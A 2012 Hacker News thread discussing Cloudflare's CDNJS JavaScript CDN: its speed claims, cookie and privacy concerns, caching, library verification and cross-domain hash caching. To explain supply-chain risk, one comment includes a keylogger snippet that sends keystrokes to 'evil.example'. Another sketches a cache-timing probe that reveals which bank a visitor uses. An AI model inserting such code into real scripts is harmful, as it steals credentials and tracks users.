CDNJS: The Fastest Javascript Repo on the Web (cloudflare.com)
110 points by spahl on Dec 12, 2012 | 44 comments



Low latency measured from a handful of Pingdom monitoring nodes sitting in data centers does not necessarily translate to the "fastest repo on the web". We've tested CloudFlare since their launch using thousands of real users, and based on that testing their performance tends to be on the low end compared to traditional static-content CDNs. CloudFlare is more of a website proxy than a CDN; since it assumes full control of your website's DNS, it stands out more for add-on features like security. Here is a link to some real-user performance analysis I've compiled for various CDNs, including CloudFlare: http://dl.dropbox.com/u/20765204/feb12-cdn-report/index.html


I have similar experience with CloudFlare. The speed just isn't there; most CDNs perform MUCH better than they do. I would even be happy to pay for faster speeds, but that isn't the model they decided to work on. I hope they have more speed improvements coming soon.


This shouldn't be hosted on the cloudflare.com domain. Since I am a customer, every request sends my CloudFlare session cookie and a bunch of Google Analytics cookies.

Not only does that add 2.5KB of extra header info to every request, but I don't think CloudFlare should know which websites their customers have been visiting.


Yeah, that is an odd decision. Makes you wonder if the “secret” motive of CloudFlare in hosting this, other than to promote their service, is to track and analyze your visitors.

I don't see a privacy policy on CDNJS.com. I'd definitely like to know what data they collect about my visitors and what they do with it.

At least the CDN doesn't itself set any cookies.


If anything this would only affect other CloudFlare users (people who have logged in to cloudflare.com). Most users won't have any cookies on that domain.


There's nothing to stop them from setting cookies in the responses down the track, though. Wait until you've got enough users, then one day just switch on your third-party multi-site user tracking. Or, perhaps less publicly discoverable, use browser fingerprinting and IP address correlation to do the same thing with somewhat less accuracy, but completely invisibly.

And note, too, that if you're relying on a third party to serve JavaScript that your users are going to run in their browsers - if that third party isn't trustworthy, you're screwed in much worse ways than cookie-tracking privacy violations. Who'd notice if they started occasionally serving a modified version of jQuery which sent all form field keydowns (i.e., your usernames and passwords) back to themselves?
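
For illustration, a tampered copy would only need a few extra lines appended - a hypothetical sketch, where "evil.example" stands in for the attacker's server:

    // Appended to an otherwise-legitimate library file (hypothetical).
    document.addEventListener('keydown', function (e) {
      var t = e.target;
      if (t && t.tagName === 'INPUT') {
        // Exfiltrate each keystroke via an image request - no XHR or CORS needed.
        new Image().src = 'https://evil.example/log?k=' +
          encodeURIComponent(e.key || e.keyCode) +
          '&f=' + encodeURIComponent(t.name || '');
      }
    }, true);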


Following the money especially helps in this situation.

How does CloudFlare make its money? It's a CDN company. I mean, that's the CORE of what they do. What is CDNJS? It's a CDN.

A simpler theory is that hosting a JavaScript CDN (and demonstrating that it's even better than Google's, which is impressive) is going to provide a lot of free advertising for their product. If I use their CDN for JS and it works really well, I'm likely to go back to them for hosting other things, because using CDNJS is almost like doing a free trial of their actual CDN.

It's not as if their main source of income were in some other industry, where we'd have to make a cognitive leap to see their ulterior motive. It's precisely this: CDNs.


Dude, a good CDN will set cache headers that make browsers store the items forever, without even revalidating the content.

That's not very usable for tracking purposes: they will only know about a user's first visit. Even better, if sites A and B use the same JS library and version, they will only know about the first one the user visits.
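
Concretely, a response with headers along these lines (illustrative values) will be kept for a year without any revalidation:

    Cache-Control: public, max-age=31536000
    Expires: Thu, 12 Dec 2013 00:00:00 GMT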

Anyway, it's a bad technical decision not to use a separate domain to ensure clients don't send extra cookies in the headers.


This is way too paranoid. CloudFlare are a reputable company; they're not blackhats.

I think my comment above was too paranoid, as well, but it's too late to edit. All I was suspicious of was that there might be analysis going on.


Honestly, I don't think that it is some conspiracy to track me, rather it was just a mistake. Perhaps I am not cynical enough.


Microsoft just changed their CDN URL because of this: http://www.asp.net/ajaxlibrary/cdn.ashx

Though for the most part, people will not have cookies set on the domain unless they have visited the main site (i.e. they are developers).


Could you set up a CNAME on your website that points cdnjs.mycompany.com to cdnjs.cloudflare.com to solve this (for your site visitors)?

Or would that mess up cloudflare's anycast DNS?
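
The record itself would be trivial - a BIND-style sketch, though whether the far end answers for that hostname is another matter:

    cdnjs.mycompany.com.    IN    CNAME    cdnjs.cloudflare.com.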


Wouldn't the browser still send cdnjs.mycompany.com in the Host: header and break the page?


That is exactly what happens. The server isn't set up to respond to requests for the cdnjs.mycompany.com hostname, and it returns a 409 error.


Ah, thanks for the info. Damn virtual hosts!


There is no cookie information (CloudFlare, Google, or otherwise) sent for requests to CDNJS resources.


The first thing I did was request backbone.min.js and open the web console to check the response time. I looked at the request and saw cookies:

http://i.imgur.com/Qqzc3.jpg


In addition, the reason to host this on a single domain vs. your own site is that users only have to download the resource once, for all the sites they visit.


For analytics and tag generation of libraries hosted by CDNJS, take a look at http://www.scriptselect.com - it's a weekend project I did a couple of weeks ago using D3 and Backbone. You can select libraries, view the selected libraries' sizes, and copy the generated script tags for the libraries you've selected. Just a little tool to make using CDNJS a little more convenient. If there's enough demand, I'll add other CDNs.

Thanks to Ryan, Thomas, and CloudFlare for a very cool service!


Quick question... I thought the best part of CDN-hosted JS files was that they were more likely to already be cached on the client, not so much the speed of delivery.

So, wouldn't it be better to go with the most popular and not the fastest?


For jQuery, maybe. But if you're using, say, Backbone, the point is moot because only CDNJS has it. The Google CDN[1] hosts only 11 libraries; CDNJS hosts over 200.

1. https://developers.google.com/speed/libraries/devguide


+1 to joshfraser - cache hits always beat requests. I remember seeing a stat that some n% of the top 100 sites use the Google CDN for jQuery; it was by far the most popular. Stick with Google for popular libraries.


Backing up wild performance claims with a Pingdom chart?

I really don't know how anyone can take CloudFlare seriously anymore...


They say this is 'peer-reviewed', but is that all? If someone sends them a pull request for an update to a widely used but perhaps smaller library, will they review it, or does it just get merged into the CDN? It seems like a good way to get access to millions of browser sessions. Is anyone at CloudFlare taking responsibility for checking that the code is coming from the authoritative repo and not joeblow/underscore.js?

https://github.com/cdnjs/cdnjs#pull-requests-steps

While Google and Microsoft are slower to update their libs, we can assume that they are downloading releases from official sources.


Contributors generally include the links to the official sources.

If not we track down the official repositories ourselves.

Once we have verified the source, we diff the submitted file against the official one. We have flirted with the idea of automating this, but your comment highlights the problem with such a solution, so we are still checking diffs manually for maximum security.
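
Roughly, the manual check amounts to something like this - a sketch in Node.js, not our actual tooling; the URL and path are just examples:

    // Sketch only: compare a submitted file against the official release.
    var https = require('https');
    var crypto = require('crypto');
    var fs = require('fs');

    function sha1(buf) {
      return crypto.createHash('sha1').update(buf).digest('hex');
    }

    https.get('https://code.jquery.com/jquery-1.8.3.min.js', function (res) {
      var chunks = [];
      res.on('data', function (c) { chunks.push(c); });
      res.on('end', function () {
        var official = Buffer.concat(chunks);
        var submitted = fs.readFileSync('ajax/libs/jquery/1.8.3/jquery.min.js');
        console.log(sha1(official) === sha1(submitted)
          ? 'files match'
          : 'MISMATCH - manual diff required');
      });
    });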


The fastest request is the one that never happens. One of the biggest benefits of using hosted libraries is that browsers cache those files locally. By sharing the same URL for your copy of jQuery with thousands of other sites, you increase your odds of getting a local browser cache hit. For popular libraries like jQuery you're probably best using Google since they have the most adoption. That said, I think CloudFlare's CDN is an interesting idea and could grow into something genuinely useful especially for less popular libraries.
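
That is, the win comes from thousands of pages all embedding the exact same tag, e.g.:

    <script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>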


The question I have [but not the answer] is:

Usually every project has a bunch of .js files [jQuery, Backbone, etc.] and .css files. So good practice is not only to minify and compress them, but also to bundle some/all of them into a few big combined files to save on extra HTTP calls.

So my question is - which is better: (1) serving separate files from such a CDN [or any public CDN], or (2) combining the files and serving them yourself via nginx/AWS?

Not a developer, feel free to correct any mistakes :-)


It's a great question. The answer depends on a lot of variables: your cache hit ratio, the size and number of files, etc. I'd recommend doing a performance A/B test using JavaScript to time which one is best for your particular site. We offer a free Real User Measurement tool at Torbit (http://torbit.com) that includes the ability to run A/B tests like this.
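
A minimal version of such a test might look like this - a sketch only; the beacon endpoint and bundle path are placeholders:

    // Randomly assign each visitor to the shared CDN copy or a self-hosted
    // bundle, time the script load, and beacon the result back.
    var useCdn = Math.random() < 0.5;
    var src = useCdn
      ? '//cdnjs.cloudflare.com/ajax/libs/jquery/1.8.3/jquery.min.js'
      : '/assets/bundle.min.js';  // hypothetical self-hosted bundle
    var start = new Date().getTime();
    var s = document.createElement('script');
    s.src = src;
    s.onload = function () {
      var ms = new Date().getTime() - start;
      new Image().src = '/beacon?variant=' + (useCdn ? 'cdn' : 'self') + '&ms=' + ms;
    };
    document.getElementsByTagName('head')[0].appendChild(s);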


Depends on how many files you have, but as a general answer, it should be (1).


CDNJS is a great public service; I've been using it for various projects for a while and it seems consistently fast everywhere.


I've recently started using CDNJS for my projects. Thanks to Ryan, Thomas, and CloudFlare for this awesome service!

Even happier to see that you guys host the CSS and images for common libs. I will switch my Bootstrap CSS hosting over to yours soon.


We can still improve this by caching across CDNs.


You mean updating browsers to recognize the same file across different domains (e.g. by MD5 hash)?
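
i.e. something like this, purely hypothetical markup:

    <!-- Hypothetical: the browser could reuse any cached file whose content
         matches the hash, regardless of which domain originally served it. -->
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.8.3/jquery.min.js"
            hash="md5:<32-hex digest of the file>"></script>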



Shipping Google Chrome with a pre-downloaded static cache of all these popular JS hosting services' URLs and contents would probably help the most and be really easy to implement.


The reasons this hasn't been done:

a) it would require all servers and browsers to be updated, for what is a marginal gain

b) it's a privacy nightmare


It would require browsers to be updated (to support checking the hash), but not servers.


a) No it wouldn't; it would be totally optional. b) Get over it; there is no difference between this and CDNs.


> Get over it; there is no difference between this and CDNs.

except the part where you track people across sites

What I am saying is not speculative. This has been proposed previously and shot down. There is a reason why it hasn't happened.


Where would you be tracking people across sites?


If you trawl through the IETF and, more recently, WHATWG mailing lists, you will find that every time caching comes up - either with Last-Modified or when ETag was being ratified - the proposal for cross-origin caching also comes up, and is rejected.

The browser vendors have just spent the past 4-5 years locking down cross-origin access in the DOM because of all the security and privacy implications. Corporate profiles and ISO standards don't even accept running the code, let alone caching it (I've worked on plenty of corporate projects where you aren't allowed to even use Google-hosted JS - it just won't run due to AD policies).

To give you but one example of what arises with this new vector: say I were to go to the top 50 banking sites and take a sample of a JavaScript file that is unique to each site. I would then take the hash of each file and, in a single web page, include a script element with the hash of each of those files. When a visitor hits that page and the browser attempts to load each script element, if one loads in 4ms then I know the file was in the cache and that the visitor is a customer of that bank.
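
In code, each probe would be as simple as this (hypothetical, assuming such a hash attribute existed; reportHit is a placeholder):

    // One probe per target site's unique file.
    var s = document.createElement('script');
    s.src = 'https://attacker.example/dummy.js';  // never fetched on a cache hit
    s.setAttribute('hash', 'md5:<digest of the bank-specific file>');
    var t0 = new Date().getTime();
    s.onload = function () {
      // A near-instant load means it came from the shared cache,
      // i.e. the visitor has been to that bank's site.
      if (new Date().getTime() - t0 < 10) reportHit();
    };
    document.body.appendChild(s);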


Why would the banks enable hashing on their unique stuff? It would be their security flaw, not the design of the system.


Well, that is just one example, and as I mentioned, cross-origin requests and access have recently been locked down further, not opened up. With all the different versions and variants of libraries, you would be implementing and exposing a lot to save very little - you wouldn't even save 1% of web requests. As mentioned, this isn't a new idea; I'm just telling you the reasons why it hasn't happened and won't.


Is the Chrome extension[1] working? I was just thinking that I might start to use CDNJS if there were a browser extension that makes sure those requests always stay local; otherwise it's rather slow to use any remote resource while developing a page locally.

1. https://github.com/cdnjs/browser-extension




